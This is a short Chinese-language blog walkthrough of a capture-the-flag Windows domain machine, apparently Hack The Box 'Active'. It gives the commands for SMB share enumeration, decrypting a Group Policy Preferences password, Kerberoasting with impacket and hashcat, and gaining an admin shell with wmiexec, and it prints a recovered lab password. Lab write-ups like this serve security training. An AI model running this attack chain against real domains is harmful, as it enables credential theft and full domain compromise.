nmap -sS -Pn -n -T4 -p- 10.10.10.100
data:image/s3,"s3://crabby-images/973f8/973f8a7f516334a9fb6489e352a5312a507fd792" alt=""
再針對已開的port掃sV跟A
data:image/s3,"s3://crabby-images/e648d/e648d021025db66938b7fecdc36319b2a2cc266e" alt=""
smbmap -H <ip> 檢查權限
data:image/s3,"s3://crabby-images/3ee61/3ee6154b369624ce0567f210d6dd3ffe25f961a8" alt=""
smbclient //10.10.10.100/Replication進入後recurse ON->prompt OFF->mget *把檔案全載回來後再慢慢翻
data:image/s3,"s3://crabby-images/4d272/4d27231f05d81496c40e5c0538dafffb765bd70a" alt=""
grep -ril "pass" *找有趣的檔案,發現存在Groups.xml,可直接透過gpp-decrypt解密
data:image/s3,"s3://crabby-images/aab22/aab22791e76622739ffaa3d98155856132db5305" alt=""
gpp-decrypt <cpassword>,得知密碼
data:image/s3,"s3://crabby-images/79154/79154ac445b3f7e1cdff42240604a5b97068e696" alt=""
leafpad看domain、帳號
data:image/s3,"s3://crabby-images/28ec6/28ec6ace40ce2609dfbe1d8c9a744c1562ae75a2" alt=""
smbclient先撈SVC_TGS的桌面資訊,找到user.txt,直接mget回來,即可取得flag
data:image/s3,"s3://crabby-images/bf065/bf065f5a9e94f4635310423dc728754c5572019d" alt=""
因已取得一組帳密,且kerberos也有開,就透過https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py撈hash
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18後發現顯示錯誤訊息
data:image/s3,"s3://crabby-images/38d5c/38d5ca8bd43c175eb04b0944b3cfd394d5e37ddb" alt=""
看issue得知要更新impacket版本,直接pip install --upgrade impacket即可,再跑一次,成功取得hash
data:image/s3,"s3://crabby-images/0db5b/0db5be18fdbee6cbeced9827b1aa5e9730c92434" alt=""
先把hash儲存檔案,另可在hash最前段得知採kerberos tgs方式,hashcat -m 13100用rockyou直接爆破取得admin密碼
data:image/s3,"s3://crabby-images/0406b/0406b168d979de29e2be7c7f283191124327b323" alt=""
直接用impacket的wmiexec連入,取得root
data:image/s3,"s3://crabby-images/552de/552de0b741f540af66c1171c89cecdf44a45f5af" alt=""
沒有留言:
張貼留言